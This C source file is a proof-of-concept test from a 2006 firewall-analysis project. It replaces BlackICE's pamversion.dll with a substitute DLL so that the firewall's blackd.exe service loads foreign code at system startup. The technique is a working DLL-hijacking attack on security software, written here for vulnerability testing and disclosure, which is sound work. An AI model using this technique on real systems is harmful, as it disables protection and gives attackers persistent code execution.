/*

 Testing program for DLL faking of run-time linked libraries (BTP00022P003BI)


 Usage:
 prog INSTDIR
   INSTDIR - BlackICE installation directory

 Description:
 This program uses standard Windows API function to rename file "pamversion.dll" in BlackICE 
 installation directory. Then copies its own library instead of orginal "pamversion.dll".
 This DLL is loaded into processes called "blackd.exe" during the system startup.

 Test:
 Running the testing program with a path to BlackICE installation directory as an argument
 and restarting the system.

*/

#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>

void about(void)
{
  printf("Testing program for DLL faking of run-time linked libraries (BTP00022P003BI)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2006 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/\n\n");
  return;
}

void usage(void)
{
  printf("Usage: INSTDIR\n"
         "  INSTDIR - BlackICE installation directory\n");
  return;
}

void print_last_error()
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %d\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %d.\n",code);
  return;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  char curdir[MAX_PATH],testdll[MAX_PATH],pamversion[MAX_PATH],pamversion_new[MAX_PATH];
  GetCurrentDirectory(MAX_PATH,curdir);
  int curdirlen=strlen(curdir)-1;
  if (curdir[curdirlen]=='\\') curdir[curdirlen]='\0';


  int err=1;
  snprintf(pamversion,MAX_PATH,"%s\\pamversion.dll",argv[1]);
  snprintf(pamversion_new,MAX_PATH,"%s\\pamversion.dll.bug",argv[1]);
  snprintf(testdll,MAX_PATH,"%s\\testdll.dll",curdir);
  if (MoveFileEx(pamversion,pamversion_new,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
  {
    printf("File \"%s\" moved to \"%s\".\n",pamversion,pamversion_new);
    if (CopyFile(testdll,pamversion,FALSE))
    {
      printf("File \"%s\" copied to \"%s\".\n",testdll,pamversion);
      err=0;
    } else fprintf(stderr,"Unable to move file \"%s\" to \"%s\".\n",testdll,pamversion);
  } else fprintf(stderr,"Unable to move file \"%s\" to \"%s\".\n",pamversion,pamversion_new);

  if (err)
  {
    print_last_error();
    fprintf(stderr,"\n");
    printf("\nTEST FAILED!\n");
    return 1;
  }

  printf("\nTEST SUCCESSFUL!\n");
  return 0;
}
